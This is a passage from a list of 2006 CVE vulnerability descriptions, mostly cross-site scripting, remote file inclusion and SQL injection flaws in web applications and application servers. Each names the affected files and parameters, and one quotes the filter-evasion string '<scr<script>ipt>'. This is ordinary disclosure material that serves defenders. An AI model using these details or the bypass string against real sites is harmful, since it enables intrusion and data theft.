error message. [CVE-2006-2795] Multiple cross-site scripting (XSS) vulnerabilities in XiTi Tracking Script 6 and 7 RC allow remote attackers to inject arbitrary web script or HTML via (1) the xtref parameter in xiti.js and (2) an HTTP Referer header field. NOTE: the provenance of this information is unknown [CVE-2006-2785] Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 1.5.0.4 allows user-assisted remote attackers to inject arbitrary web script or HTML by tricking a user into (1) performing a "View Image" on a broken image in which the SRC attribute contains a Javascript URL, or (2) selecting "Show only this frame" on a frame whose SRC attribute contains a Javascript URL. [CVE-2006-2784] The PLUGINSPAGE functionality in Mozilla Firefox before 1.5.0.4 allows remote user-assisted attackers to execute privileged code by tricking a user into installing missing plugins and selecting the "Manual Install" button, then using nested javascript: URLs. NOTE: the manual install button is used for downloading software from a remote web site, so this issue would not cross privilege boundaries if the user progresses to the point of installing malicious software from the attacker-controlled site. [CVE-2006-2777] Unspecified vulnerability in Mozilla Firefox before 1.5.0.4 and SeaMonkey before 1.0.2 allows remote attackers to execute arbitrary code by using the nsISelectionPrivate interface of the Selection object to add a SelectionListener and create notifications that are executed in a privileged context. [CVE-2006-2774] Cross-site scripting (XSS) vulnerability in search.php in QontentOne CMS allows remote attackers to inject arbitrary web script or HTML via the search_phrase parameter. [CVE-2006-2772] Cross-site scripting (XSS) vulnerability in add.asp in Hogstorps hogstorp guestbook 2.0 allows remote attackers to inject arbitrary web script or HTML via the (1) name, (2) email, and (3) headline parameters. NOTE: the provenance of this information is unknown [CVE-2006-2765] Cross-site scripting (XSS) vulnerability in news_information.php in Interlink Advantage allows remote attackers to inject arbitrary web script or HTML via the flag parameter. [CVE-2006-2764] Cross-site scripting (XSS) vulnerability in GuestbookXL 1.3 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in an IMG tag in a comment field to (1) guestwrite.php or (2) guestbook.php. [CVE-2006-2762] PHP remote file inclusion vulnerability in includes/config.php in WebCalendar 1.0.3 allows remote attackers to execute arbitrary PHP code via a URL in the includedir parameter, which is remotely accessed in an fopen call whose results are used to define a user_inc setting that is used in an include_once call. [CVE-2006-2757] Cross-site scripting (XSS) vulnerability in Chipmunk guestbook allows remote attackers to inject arbitrary web script or HTML via the (1) start parameter in (a) index.php [CVE-2006-2756] Eitsop My Web Server 1.0 allows remote attackers to cause a denial of service (application crash) via a long GET request. NOTE: CVE analysis suggests that this is a different product, and therefore a different vulnerability, than CVE-2002-1897. [CVE-2006-2755] Cross-site scripting (XSS) vulnerability in index.php in UBBThreads 5.x and earlier allows remote attackers to inject arbitrary web script or HTML via the debug parameter, as demonstrated by stealing MD5 hashes of passwords. [CVE-2006-2751] Cross-site scripting (XSS) vulnerability in Open Searchable Image Catalogue (OSIC) 0.7.0.1 and earlier allows remote attackers to inject arbitrary web scripts or HTML via the item_list parameter in search.php. [CVE-2006-2750] Cross-site scripting (XSS) vulnerability in the do_mysql_query function in core.php for Open Searchable Image Catalogue (OSIC) before 0.7.0.1 allows remote attackers to inject arbitrary web scripts or HTML via failed SQL queries, which is reflected in an error message. [CVE-2006-2746] Multiple cross-site scripting (XSS) vulnerabilities in F@cile Interactive Web 0.8.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) lang parameter in index.php, and the (2) mytheme and (3) myskin parameters in multiple "p-themes" index.inc.php files including (c) lowgraphic, (d) classic, (e) puzzle, (f) simple, and (g) ciao. NOTE: vectors 2 and 3 might be resultant from file inclusion issues. [CVE-2006-2745] Multiple PHP remote file inclusion vulnerabilities in F@cile Interactive Web 0.8.5 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) pathfile parameter in (a) p-editpage.php and (b) p-editbox.php, and the (2) mytheme and (3) myskin parameters in multiple "p-themes" index.inc.php files including (c) lowgraphic, (d) classic, (e) puzzle, (f) simple, and (g) ciao. [CVE-2006-2744] PHP remote file inclusion vulnerability in p-popupgallery.php in F@cile Interactive Web 0.8.41 through 0.8.5 allows remote attackers to execute arbitrary PHP code via a URL in the l parameter. [CVE-2006-2741] Cross-site scripting (XSS) vulnerability in Epicdesigns tinyBB 0.3 allow remote attackers to inject arbitrary web script or HTML via the q parameter in forgot.php, which is echoed in an error message, and other unspecified vectors. [CVE-2006-2729] Cross-site scripting (XSS) vulnerability in superalbum/index.php in Photoalbum B&W 1.3 allows remote attackers to inject arbitrary web script or HTML via the gal parameter. NOTE: the provenance of this information is unknown [CVE-2006-2728] Cross-site scripting (XSS) vulnerability in superalbum/index.php in Photoalbum B&W 1.3 allows remote attackers to inject arbitrary web script or HTML via the pic parameter. [CVE-2006-2724] Cross-site scripting (XSS) vulnerability in PunBB 1.2.11 allows remote authenticated administrators to inject arbitrary HTML or web script to other administrators via the "Admin note" feature, a different vulnerability than CVE-2006-2227. [CVE-2006-2723] Unspecified versions of Mozilla Firefox allow remote attackers to cause a denial of service (crash) via a web page that contains a large number of nested marquee tags. NOTE: a followup post indicated that the initial report could not be verified. [CVE-2006-2721] Cross-site scripting (XSS) vulnerability in news.php in VARIOMAT allows remote attackers to inject arbitrary HTML or web script via the subcat parameter. NOTE: this issue might be resultant from SQL injection. [CVE-2006-2699] Cross-site scripting (XSS) vulnerability in getimage.php in Geeklog 1.4.0sr2 and earlier allows remote attackers to inject arbitrary HTML or web script via the image argument in a show action. [CVE-2006-2696] Cross-site scripting (XSS) vulnerabilities in Easy-Content Forums 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) startletter parameter in userview.asp and the (2) catid parameter in topics.asp. [CVE-2006-2692] Multiple unspecified vulnerabilities in aMuleWeb for AMule before 2.1.2 allow remote attackers to read arbitrary image, HTML, or PHP files via unknown vectors, probably related to directory traversal. [CVE-2006-2691] Unspecified "information leakage" vulnerabilities in aMuleWeb for AMule before 2.1.2 allow remote attackers to access arbitrary images, including dynamically generated images, via unknown vectors. [CVE-2006-2690] An unspecified script in EVA-Web 2.1.2 and earlier, probably index.php, allows remote attackers to obtain the full path of the web server via invalid (1) perso or (2) aide parameters. [CVE-2006-2689] Multiple cross-site scripting (XSS) vulnerabilities in EVA-Web 2.1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) debut_image parameter in (a) article-album.php3, (2) date parameter in (b) rubrique.php3, and the (3) perso and (4) aide parameters to (c) an unknown script, probably index.php. [CVE-2006-2687] Cross-site scripting (XSS) vulnerability in adduser.php in PHP-AGTC Membership System 1.1a and earlier allows remote attackers to inject arbitrary web script or HTML via the email address (useremail parameter). [CVE-2006-2684] Cross-site scripting (XSS) vulnerability in the search module in CMS Mundo 1.0 allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. [CVE-2006-2680] Cross-site scripting (XSS) vulnerability in index.php in AZ Photo Album Script Pro allows remote attackers to inject arbitrary web script or HTML via the gazpart parameter. [CVE-2006-2679] Unspecified vulnerability in the VPN Client for Windows Graphical User Interface (GUI) (aka the VPN client dialer) in Cisco VPN Client for Windows 4.8.00.* and earlier, except for 4.7.00.0533, allows local authenticated, interactive users to gain privileges, possibly due to privileges of dialog boxes, aka bug ID CSCsd79265. [CVE-2006-2678] Multiple cross-site scripting (XSS) vulnerabilities in Pre News Manager 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to (a) index.php, and the (2) nid parameter to (b) news_detail.php, (c) email_story.php, (d) thankyou.php, (e) printable_view.php, (f) tella_friend.php, and (g) send_comments.php. [CVE-2006-2677] SiteScape Forum 7.2 and possibly earlier stores the avf.rc configuraiton file under the web document root with insufficient access control, which allows remote attackers to obtain sensitive path information. [CVE-2006-2673] Cross-site scripting (XSS) vulnerability in search.html in Bulletin Board Elite-Board (E-Board) 1.1 allows remote attackers to inject arbitrary web script or HTML via the search box. [CVE-2006-2672] Multiple cross-site scripting (XSS) vulnerabilities in Realty Pro One allow remote attackers to inject arbitrary web script or HTML via the (1) listingid parameter to (a) images.php, (b) index_other.php, or (c) request_info.php [CVE-2006-2670] Multiple cross-site scripting (XSS) vulnerabilities in ChatPat 1.0 allow remote attackers to inject arbitrary web script or HTML via a chat message in (1) fastchat.php and (2) fastshow.php. [CVE-2006-2669] Multiple cross-site scripting (XSS) vulnerabilities in Pre Shopping Mall 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) search parameter in search.php (the "search box"), (2) the prodid parameter in detail.php, and the (3) cid parameter in products.php. [CVE-2006-2666] PHP remote file inclusion vulnerability in includes/mailaccess/pop3.php in V-Webmail 1.5 through 1.6.4 allows remote attackers to execute arbitrary PHP code via a URL in the CONFIG[pear_dir] parameter. [CVE-2006-2665] PHP remote file inclusion vulnerability in includes/mailaccess/pop3/core.php in V-Webmail 1.3 allows remote attackers to execute arbitrary PHP code via a URL in the CONFIG[pear_dir] parameter. [CVE-2006-2664] Cross-site scripting (XSS) vulnerability in iFdate 1.2 allows remote attackers to inject arbitrary web script or HTML via the (1) username, (2) password fields, or certain other input text boxes. [CVE-2006-2663] Multiple cross-site scripting (XSS) vulnerabilities in iFlance 1.1 allow remote attackers to inject arbitrary web script or HTML via certain inputs to (1) acc_verify.php or (2) project.php. [CVE-2006-2658] Directory traversal vulnerability in the xsp component in mod_mono in Mono/C# web server, as used in SUSE Open-Enterprise-Server 1 and SUSE Linux 9.2 through 10.0, allows remote attackers to read arbitrary files via a .. (dot dot) sequence in an HTTP request. [CVE-2006-2653] Cross-site scripting (XSS) vulnerability in login_error.shtml for D-Link DSA-3100 allows remote attackers to inject arbitrary HTML or web script via an encoded uname parameter. [CVE-2006-2652] Cross-site scripting (XSS) vulnerability in WikiNi 0.4.2 and earlier allows remote attackers to inject arbitrary HTML and web script by editing a Wiki page to contain the script. [CVE-2006-2651] Cross-site scripting (XSS) vulnerability in index.php in Vacation Rental Script 1.0 allows remote attackers to inject arbitrary web script or HTML via the obj parameter. [CVE-2006-2649] Multiple cross-site scripting (XSS) vulnerabilities in (a) search.php, (b) search_cat.php, (c) search_price.php, and (d) product_details.php in the cosmicshop directory for CosmicShoppingCart allow remote attackers to inject arbitrary web script or HTML via multiple unspecified parameters, as demonstrated by the (1) query parameter in search.php and the (2) data parameter in search_cat.php. [CVE-2006-2648] Cross-site scripting (XSS) vulnerability in perform_search.asp for ASPBB 0.52 and earlier allows remote attackers to inject arbitrary HTML or web script via the search parameter. [CVE-2006-2643] Cross-site scripting (XSS) vulnerability in index.php in Monster Top List (MTL) 1.4 allows remote attackers to inject arbitrary web script or HTML via the user_error_message parameter. [CVE-2006-2642] UNVERIFIABLE NOTE: this issue does not contain any verifiable or actionable details. Cross-site scripting (XSS) vulnerability in Marco M. F. De Santis Php-residence 0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via "any of its input." NOTE: the original disclosure is based on vague researcher claims without vendor acknowledgement [CVE-2006-2641] UNVERIFIABLE NOTE: this issue does not contain any verifiable or actionable details. Cross-site scripting (XSS) vulnerability in John Frank Asset Manager (AssetMan) 2.4a and earlier allows remote attackers to inject arbitrary web script or HTML via "any of its input." NOTE: the original disclosure is based on vague researcher claims without vendor acknowledgement [CVE-2006-2640] Cross-site scripting (XSS) vulnerability in OmegaMw7a.ASP in OMEGA (aka Omegasoft) INterneSErvicesLosungen (INSEL) allows remote attackers to inject arbitrary web script or HTML via the WCE parameter. [CVE-2006-2639] Cross-site scripting (XSS) vulnerability in the input forms in prattmic and Master5006 PHPSimpleChoose 0.3 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element. [CVE-2006-2637] Cross-site scripting (XSS) vulnerability in view.php in TuttoPhp (1) Morris Guestbook 1, (2) Pretty Guestbook 1, and (3) Smile Guestbook 1 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element in the pagina parameter. [CVE-2006-2635] Multiple cross-site scripting (XSS) vulnerabilities in Tikiwiki (aka Tiki CMS/Groupware) 1.9.x allow remote attackers to inject arbitrary web script or HTML via malformed nested HTML tags such as "<scr<script>ipt>" in (1) offset and (2) days parameters in (a) tiki-lastchanges.php, the (3) find and (4) offset parameters in (b) tiki-orphan_pages.php, the (5) offset and (6) initial parameters in (c) tiki-listpages.php, and (7) an unspecified field in (d) tiki-remind_password.php [CVE-2006-2634] Cross-site scripting (XSS) vulnerability in Neocrome Land Down Under (LDU) in Neocrome Seditio 102 allows remote attackers to inject arbitrary web script or HTML via an HTTP Referer field. [CVE-2006-2632] Cross-site scripting (XSS) vulnerability in Andrew Godwin ByteHoard 2.1 and earlier allows remote authenticated users to inject arbitrary web script or HTML via file descriptions. [CVE-2006-2618] Cross-site scripting (XSS) vulnerability in (1) AlstraSoft Web Host Directory 1.2, aka (2) HyperStop WebHost Directory 1.2, might allow remote attackers to inject arbitrary web script or HTML via the "write a review" box. NOTE: since user reviews do not require administrator privileges, and an auto-approve mechanism exists, this issue is a vulnerability. [CVE-2006-2617] (1) AlstraSoft Web Host Directory 1.2, aka (2) HyperStop WebHost Directory 1.2, allows remote attackers to obtain the installation path via an invalid entry in the Username field on the login page, which causes the path to be displayed in an SQL error. NOTE: this issue might be resultant from SQL injection. [CVE-2006-2616] SQL injection vulnerability in the search script in (1) AlstraSoft Web Host Directory 1.2, aka (2) HyperStop WebHost Directory 1.2, allows remote attackers to execute arbitrary SQL commands via the uri parameter. [CVE-2006-2610] Cross-site scripting (XSS) vulnerability in view.php in phpRaid 2.9.5 allows remote attackers to inject arbitrary web script or HTML via the (1) URL query string and the (2) Sort parameter. [CVE-2006-2606] Cross-site scripting (XSS) vulnerability in Chatty, possibly 1.0.2 and other versions, allows remote attackers to inject arbitrary web script or HTML via the username. [CVE-2006-2605] Cross-site scripting (XSS) vulnerability in DSChat 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the chatbox, probably involving the ctext parameter to send.php. [CVE-2006-2587] Buffer overflow in the WebTool HTTP server component in (1) PunkBuster before 1.229, as used by multiple products including (2) America's Army 1.228 and earlier, (3) Battlefield 1942 1.158 and earlier, (4) Battlefield 2 1.184 and earlier, (5) Battlefield Vietnam 1.150 and earlier, (6) Call of Duty 1.173 and earlier, (7) Call of Duty 2 1.108 and earlier, (8) DOOM 3 1.159 and earlier, (9) Enemy Territory 1.167 and earlier, (10) Far Cry 1.150 and earlier, (11) F.E.A.R. 1.093 and earlier, (12) Joint Operations 1.187 and earlier, (13) Quake III Arena 1.150 and earlier, (14) Quake 4 1.181 and earlier, (15) Rainbow Six 3: Raven Shield 1.169 and earlier, (16) Rainbow Six 4: Lockdown 1.093 and earlier, (17) Return to Castle Wolfenstein 1.175 and earlier, and (18) Soldier of Fortune II 1.183 and earlier allows remote attackers to cause a denial of service (application crash) via a long webkey parameter. [CVE-2006-2586] Cross-site scripting (XSS) vulnerability in IpLogger 1.7 and earlier allows remote attackers to inject arbitrary HTML or web script via the HTTP_REFERER header in an HTTP request. [CVE-2006-2584] Multiple cross-site scripting (XSS) vulnerabilities in post.php in SkyeBox 1.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) message parameters. NOTE: the provenance of this information is unknown [CVE-2006-2581] Cross-site scripting (XSS) vulnerability in Wiki content in RWiki 2.1.0pre1 through 2.1.0 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2006-2572] Cross-site scripting (XSS) vulnerability in index.php in DGBook 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) name, (2) homepage, (3) email, and (4) address parameters. [CVE-2006-2571] Cross-site scripting (XSS) vulnerability in search.html in Alkacon OpenCms 6.0.0, 6.0.2, and 6.0.3 allows remote attackers to inject arbitrary web script or HTML via the query parameter in a search action. [CVE-2006-2567] Cross-site scripting (XSS) vulnerability in submit_article.php in Alstrasoft Article Manager Pro 1.6 allows remote attackers to inject arbitrary web script or HTML when submitting an article, as demonstrated using a javascript URI in a Cascading Style Sheets (CSS) property of a STYLE attribute of an element. [CVE-2006-2564] Multiple cross-site scripting (XSS) vulnerabilities in index.php in AlstraSoft E-Friends allow remote attackers to inject arbitrary web script or HTML by (1) posting a blog, (2) posting a listing, (3) posting an event, (4) adding comments, or (5) sending a message. [CVE-2006-2558] Cross-site scripting (XSS) vulnerability in IpLogger 1.7 and earlier allows remote attackers to inject arbitrary HTML or web script via the User-Agent (useragent) header in an HTTP request, which is not filtered when the log files are viewed. [CVE-2006-2556] Cross-site scripting (XSS) vulnerability in Florian Amrhein NewsPortal before 0.37, and possibly TR Newsportal (TRanx rebuilded), allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2006-2553] Cross-site scripting (XSS) vulnerability in Jemscripts DownloadControl 1.0 allows remote attackers to inject arbitrary HTML or web script via the dcid parameter to dc.php. NOTE: the provenance of this information is unknown [CVE-2006-2546] A recommended admin password reset mechanism for BEA WebLogic Server 8.1, when followed before October 10, 2005, causes the administrator password to be stored in cleartext in the domain directory, which could allow attackers to gain privileges. [CVE-2006-2545] Multiple cross-site scripting (XSS) vulnerabilities in Xtreme Topsites 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter in stats.php and (2) unspecified inputs in lostid.php, probably the searchthis parameter. NOTE: one or more of these vectors might be resultant from SQL injection. [CVE-2006-2536] Cross-site scripting (XSS) vulnerability in Destiney Links Script 2.1.2 allows remote attackers to inject arbitrary web script or HTML via the (1) "Search" (term parameter in index.php) and (2) "Add a Site" (add.php) fields. [CVE-2006-2533] Cross-site scripting (XSS) vulnerability in (1) addWeblog.php and (2) leaveComments.php in Destiney Rated Images Script 0.5.0 does not properly filter all vulnerable HTML tags, which allows remote attackers to inject arbitrary web script or HTML via Javascript in a DIV tag. [CVE-2006-2524] Cross-site scripting (XSS) vulnerability in UseBB 1.0 RC1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors when processing the user date format. [CVE-2006-2522] Dayfox Blog 2.0 and earlier stores user credentials in edit/slog_users.txt under the web document root with insufficient access control, which allows remote attackers to gain privileges. [CVE-2006-2518] Cross-site scripting (XSS) vulnerability in phpwcms 1.2.5-DEV allows remote attackers to inject arbitrary web script or HTML via the BL[be_cnt_plainhtml] parameter to include/inc_tmpl/content/cnt6.inc.php. [CVE-2006-2517] SQL injection vulnerability in MyWeb Portal Office, Standard Edition, Public Edition, Medical Edition, Citizen Edition, School Edition, and Light Edition allows remote attackers to execute arbitrary SQL commands via unknown attack vectors. [CVE-2006-2515] Cross-site scripting (XSS) vulnerability in index.php in Hiox Guestbook 3.1 allows remote attackers to inject arbitrary web script or HTML via the input forms for signing the guestbook. [CVE-2006-2510] Cross-site scripting (XSS) vulnerability in the URL submission form in YourFreeWorld.com Short Url & Url Tracker Script allows remote attackers to inject arbitrary web script or HTML via an unspecified form for submitting URLs. [CVE-2006-2506] Multiple cross-site scripting (XSS) vulnerabilities in search.php in Sphider allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO and (2) the category parameter. [CVE-2006-2501] Cross-site scripting (XSS) vulnerability in Sun ONE Web Server 6.0 SP9 and earlier, Java System Web Server 6.1 SP4 and earlier, Sun ONE Application Server 7 Platform and Standard Edition Update 6 and earlier, and Java System Application Server 7 2004Q2 Standard and Enterprise Edition Update 2 and earlier, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors, possibly involving error messages. [CVE-2006-2500] Cross-site scripting (XSS) vulnerability in add_news.asp in CodeAvalanche News (CANews) 1.2 allows remote attackers to inject arbitrary web script or HTML via the Headline field. NOTE: if this issue is limited to administrators, and if it is expected behavior for administrators to be able to generate HTML, then this is not a vulnerability. [CVE-2006-2497] Multiple cross-site scripting (XSS) vulnerabilities in AspBB 0.5.2 allow remote attackers to inject arbitrary web script or HTML via the (1) action parameter to default.asp or (2) get parameter to profile.asp. [CVE-2006-2491] Cross-site scripting (XSS) vulnerability in (1) index.php and (2) bmc/admin.php in BoastMachine (bMachine) 3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly filtered when it is accessed using the $_SERVER["PHP_SELF"] variable. [CVE-2006-2490] Multiple cross-site scripting (XSS) vulnerabilities in Mobotix IP Network Cameras M1 1.9.4.7 and M10 2.0.5.2, and other versions before 2.2.3.18 for M10/D10 and 3.0.3.31 for M22, allow remote attackers to inject arbitrary web script or HTML via URL-encoded values in (1) the query string to help/help, (2) the get_image_info_abspath parameter to control/eventplayer, and (3) the source_ip parameter to events.tar. [CVE-2006-2488] Multiple cross-site scripting (XSS) vulnerabilities in Spymac WebOS (WOS) 5.0 allow remote attackers to inject arbitrary web script or HTML via the (1) del_folder, (2) nick, or (3) action parameters to (a) notes/index.php, (4) curr parameter to (b) ipod/get_ipod.php, and in (c) login.php. [CVE-2006-2484] Cross-site scripting (XSS) vulnerability in index.html in IceWarp WebMail 5.5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the PHPSESSID parameter. [CVE-2006-2478] Bitrix Site Manager 4.1.x allows remote attackers to redirect users to other websites via a modified back_url during a HTTP POST request. NOTE: this issue has been referred to as "cross-site scripting," but that is inconsistent with the common use of the term. [CVE-2006-2476] Bitrix Site Manager 4.1.x stores updater.log under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information. [CVE-2006-2473] DISPUTED Cross-site scripting (XSS) vulnerability in ow.asp in OpenWiki 0.78 allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: this issue has been disputed by the vendor and a third party who is affiliated with the product. The vendor states "You cannot insert code in a wikipage or via URL parameters as they are all escaped before usage, so nothing can be compromised at other sites." [CVE-2006-2472] Unspecified vulnerability in BEA WebLogic Server 9.1 and 9.0, 8.1 through SP5, 7.0 through SP6, and 6.1 through SP7 allows untrusted applications to obtain private server keys. [CVE-2006-2471] Multiple vulnerabilities in BEA WebLogic Server 8.1 through SP4, 7.0 through SP6, and 6.1 through SP7 leak sensitive information to remote attackers, including (1) DNS and IP addresses to address to T3 clients, (2) internal sensitive information using GetIORServlet, (3) certain "server details" in exceptions when invalid XML is provided, and (4) a stack trace in a SOAP fault. [CVE-2006-2470] Unspecified vulnerability in the WebLogic Server Administration Console for BEA WebLogic Server 9.0 prevents the console from setting custom JDBC security policies correctly, which could allow attackers to bypass intended policies. [CVE-2006-2469] The HTTP handlers in BEA WebLogic Server 9.0, 8.1 up to SP5, 7.0 up to SP6, and 6.1 up to SP7 stores the username and password in cleartext in the WebLogic Server log when access to a web application or protected JWS fails, which allows attackers to gain privileges. [CVE-2006-2468] The WebLogic Server Administration Console in BEA WebLogic Server 8.1 up to SP4 and 7.0 up to SP6 displays the domain name in the Console login form, which allows remote attackers to obtain sensitive information. [CVE-2006-2467] BEA WebLogic Server 8.1 up to SP4, 7.0 up to SP6, and 6.1 up to SP7 displays the internal IP address of the WebLogic server in the WebLogic Server Administration Console, which allows remote authenticated administrators to determine the address. [CVE-2006-2466] BEA WebLogic Server 8.1 up to SP4 and 7.0 up to SP6 allows remote attackers to obtain the source code of JSP pages during certain circumstances related to a "timing window" when a compilation error occurs, aka the "JSP showcode vulnerability." [CVE-2006-2464] stopWebLogic.sh in BEA WebLogic Server 8.1 before Service Pack 4 and 7.0 before Service Pack 6 displays the administrator password to stdout when executed, which allows local users to obtain the password by viewing a local display. [CVE-2006-2462] BEA WebLogic Server 8.1 before Service Pack 4 and 7.0 before Service Pack 6, may send sensitive data over non-secure channels when using JTA transactions, which allows remote attackers to read potentially sensitive network traffic. [CVE-2006-2461] BEA WebLogic Server before 8.1 Service Pack 4 does not properly set the Quality of Service in certain circumstances, which prevents some transmissions from being encrypted via SSL, and allows remote attackers to more easily read potentially sensitive network traffic. [CVE-2006-2438] Directory traversal vulnerability in the viewfile servlet in the documentation package (resin-doc) for Caucho Resin 3.0.17 and 3.0.18 allows remote attackers to read arbitrary files under other web roots via the contextpath parameter. NOTE: this issue can produce resultant path disclosure when the parameter is invalid. [CVE-2006-2437] The viewfile servlet in the documentation package (resin-doc) for Caucho Resin 3.0.17 and 3.0.18 allows remote attackers to obtain the source code for file under the web root via the file parameter. [CVE-2006-2436] WebSphere Application Server 5.0.2 (or any earlier cumulative fix) stores admin and LDAP passwords in plaintext in the FFDC logs when a login to WebSphere fails, which allows attackers to gain privileges. [CVE-2006-2435] Unspecified vulnerability in IBM WebSphere Application Server 5.0.2 and earlier, and 5.1.1 and earlier, has unknown impact and attack vectors related to "Inserting certain script tags in urls [that] may allow unintended execution of scripts." [CVE-2006-2434] Unspecified vulnerability in WebSphere 5.1.1 (or any earlier cumulative fix) Common Configuration Mode + CommonArchive and J2EE Models might allow attackers to obtain sensitive information via the trace. [CVE-2006-2433] Unspecified vulnerability in IBM WebSphere Application Server 6.0.2, 6.0.2.1, 6.0.2.3, 6.0.2.5, and 6.0.2.7 has unknown impact and attack vectors related to the "administrative console". [CVE-2006-2432] IBM WebSphere Application Server 5.0.2 (or any earlier cumulative fix) and 5.1.1 (or any earlier cumulative fix) allows EJB access on Solaris systems via a crafted LTPA token. [CVE-2006-2431] Cross-site scripting (XSS) vulnerability in the 500 Internal Server Error page on the SOAP port (8880/tcp) in IBM WebSphere Application Server 5.0.2 and earlier, 5.1.x before 5.1.1.12, and 6.0.2 up to 6.0.2.7, allows remote attackers to inject arbitrary web script or HTML via the URI, which is contained in a FAULTACTOR element on this page. NOTE: some sources have reported the element as "faultfactor," but this is likely erroneous. [CVE-2006-2430] IBM WebSphere Application Server 5.0.2 and earlier, 5.1.1 and earlier, and 6.0.2 up to 6.0.2.7 records user credentials in plaintext in addNode.log, which allows attackers to gain privileges. [CVE-2006-2429] Unspecified vulnerability in IBM WebSphere Application Server 6.0.2, 6.0.2.1, 6.0.2.3, 6.0.2.5, and 6.0.2.7 has unknown impact and remote attack vectors related to "HTTP request handlers". [CVE-2006-2425] Multiple cross-site scripting (XSS) vulnerabilities in PRV.php in PhpRemoteView, possibly 2003-10-23 and earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) f, (2) d, and (3) ref parameters, and the (4) "MAKE DIR" and (5) "Full file name" fields. [CVE-2006-2423] Cross-site scripting (XSS) vulnerability in ftplogin/index.php in Confixx 3.1.2 allows remote attackers to inject arbitrary web script or HTML via the login parameter. [CVE-2006-2419] Cross-site scripting (XSS) vulnerability in index.php in Directory Listing Script allows remote attackers to inject arbitrary web script or HTML via the dir parameter. [CVE-2006-2418] Cross-site scripting (XSS) vulnerabilities in certain versions of phpMyAdmin before 2.8.0.4 allow remote attackers to inject arbitrary web script or HTML via the db parameter in unknown scripts. [CVE-2006-2417] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.8.0.x before 2.8.0.4 allows remote attackers to inject arbitrary web script or HTML via the theme parameter in unknown scripts. NOTE: the lang parameter is already covered by CVE-2006-2031. [CVE-2006-2415] Multiple cross-site scripting (XSS) vulnerabilities in FlexChat 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) username and (2) CFTOKEN parameter in (a) index.cfm and (3) CFTOKEN and (4) CFID parameter in (b) chat.cfm. [CVE-2006-2397] Multiple cross-site scripting (XSS) vulnerabilities in GPhotos 1.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) rep parameter to (a) index.php or (b) diapo.php or (2) image parameter to (c) affich.php. NOTE: item 1a might be resultant from directory traversal. [CVE-2006-2396] Cross-site scripting (XSS) vulnerability in phpODP 1.5h allows remote attackers to inject arbitrary web script via the browse parameter. [CVE-2006-2394] Cross-site scripting (XSS) vulnerability in chat.php in PHP Live Helper allows remote attackers to inject arbitrary web script or HTML via the PHPSESSID parameter. [CVE-2006-2390] Cross-site scripting (XSS) vulnerability in OZJournals 1.2 allows remote attackers to inject arbitrary web script or HTML via the vname parameter in the comments functionality. [CVE-2006-2385] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allows user-assisted remote attackers to execute arbitrary code via a crafted web page that triggers memory corruption when it is saved as a multipart HTML (.mht) file. [CVE-2006-2368] Cross-site scripting (XSS) vulnerability in index.php in Clansys (aka Clanpage System) 1.1 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-2367] Cross-site scripting (XSS) vulnerability in index.php in Clansys (aka Clanpage System) 1.0 and 1.1 allows remote attackers to inject arbitrary web script or HTML via the func parameter in a search function. [CVE-2006-2365] Cross-site scripting (XSS) vulnerability in a_login.php in Vizra allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2006-2364] Cross-site scripting (XSS) vulnerability in the validation feature in Macromedia ColdFusion 5 and earlier allows remote attackers to inject arbitrary web script or HTML via a "_required" field when the associated normal field is missing or empty, which is not sanitized before being presented in an error message. [CVE-2006-2363] SQL injection vulnerability in the weblinks option (weblinks.html.php) in Limbo CMS allows remote attackers to execute arbitrary SQL commands via the catid parameter. [CVE-2006-2359] Cross-site scripting (XSS) vulnerability in charts.php in the Chart mod for phpBB allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this issue might be resultant from SQL injection. [CVE-2006-2358] Multiple cross-site scripting (XSS) vulnerabilities in various scripts in Web-Labs CMS allow remote attackers to inject arbitrary web script or HTML via (1) the search parameter and (2) unspecified fields related to e-mail alerts. NOTE: the provenance of this information is unknown [CVE-2006-2353] NmConsole/DeviceSelection.asp in Ipswitch WhatsUp Professional 2006 and WhatsUp Professional 2006 Premium allows remote attackers to redirect users to other websites via the (1) sCancelURL and possibly (2) sRedirectUrl parameters. [CVE-2006-2352] Multiple cross-site scripting (XSS) vulnerabilities in IPswitch WhatsUp Professional 2006 and WhatsUp Professional 2006 Premium allow remote attackers to inject arbitrary web script or HTML via unknown vectors in (1) NmConsole/Tools.asp and (2) NmConsole/DeviceSelection.asp. NOTE: the provenance of this information is unknown [CVE-2006-2351] Multiple cross-site scripting (XSS) vulnerabilities in IPswitch WhatsUp Professional 2006 and WhatsUp Professional 2006 Premium allow remote attackers to inject arbitrary web script or HTML via the (1) sDeviceView or (2) nDeviceID parameter to (a) NmConsole/Navigation.asp or (3) sHostname parameter to (b) 